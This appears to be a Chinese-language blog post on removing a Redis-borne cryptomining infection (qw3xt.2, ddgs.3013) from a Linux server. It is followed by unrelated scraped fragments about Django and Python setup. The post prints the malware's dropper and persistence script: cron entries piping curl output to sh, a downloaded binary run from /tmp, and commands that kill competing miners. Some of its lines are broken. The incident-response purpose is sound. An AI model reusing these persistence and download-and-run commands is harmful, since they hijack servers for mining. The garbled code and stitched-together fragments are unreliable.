3 月,跳不動了?>>>
linux 下qw3xt.2,解決挖礦病毒
早上開啟電腦,連線伺服器,使用top檢視cpu狀態。結果顯示程序占用cpu99%以上。
解決辦法:
1、首先解決redis入口問題,因為最開始沒有設定密碼,所以首先修改redis.conf。設定密碼,然後重啟redis
2、進入/tmp資料夾下。發現qw3xt.2檔案,刪除。之後kill掉qw3xt.2該程序,但是一段時間之後,發現該行程又重新啟動。
肯定是有守護程序,觀察top命令下的程序,發現乙個可疑的進行
3、在/tmp資料夾下發現該程序的檔案 ls /tmp
發現qw3xt.2檔案又重新生成了。這時,首先刪除qw3xt.2檔案和ddgs.3013檔案,然後使用top查詢qw3xt.2和ddgs.3013的pid,直接kill掉。
4、一段時間之後,刪除的檔案重新生成,dds和挖礦的程序又重新執行。此時懷疑是否有計畫任務,此時檢視計畫任務的列表
[root@izbp1cbg04oh74k1dexpujz tmp]# crontab -l
*/15 * * * * curl -fssl | sh
[root@izbp1cbg04oh74k1dexpujz tmp]# crontab -r //刪除計畫任務
此時計畫任務已經刪除。詳細資訊檢視
計畫任務刪除完成之後,這個13又開始執行。太頑固了。
於是我又看計畫任務的內容,是否是有東西沒有刪除乾淨。
[root@fantj tmp]# curl -fssl
export path=$path:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fssl | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fssl | sh" >> /var/spool/cron/crontabs/root
ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
curl -fssl -m) -o /tmp/ddgs.3013
fichmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013
ps auxf | grep -v grep | grep circle_mi | awk '' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '' | kill
發現計畫任務在伺服器中建立了幾個檔案,
/var/spool/cron/crontabs/root
/var/spool/cron/root
內容是*/15 * * * * curl -fssl | sh。(與計畫任務相同)
將計畫任務中建立的檔案刪除。
最終,這個挖礦病毒終於刪除完 測試伺服器上遇到的問題
師哥把兩個專案的前台和後台都放在了乙個測試伺服器上面,讓我們方便進行檢視測試 今天我在對我專案的具體模組進行檢視的時候,結果出現了internet server error 好像叫這個 錯誤,這下我不會了,還以為是使用者註冊登入許可權的問題。然後師哥給我說這種錯誤可以用測試伺服器的工作日誌來檢視問題...
Django 發上雲伺服器遇到的問題
解決方法 原文 在python安裝目錄 lib site package django view裡找到debug.py,然後在找對應位置加上 utf 8 解決辦法 去django admin.py startproject project name建立的專案中去修改 setting.py 檔案 al...
更換雲伺服器上的Python版本
阿里雲提供的python版本單一,如需要其他版本的python,可按照如下步驟來更換。0 預備 更新系統,安裝需要的工具。sudo apt get upgrade apt get update sudo apt get install gcc make1 解除安裝自帶的python 輸入如下命令 s...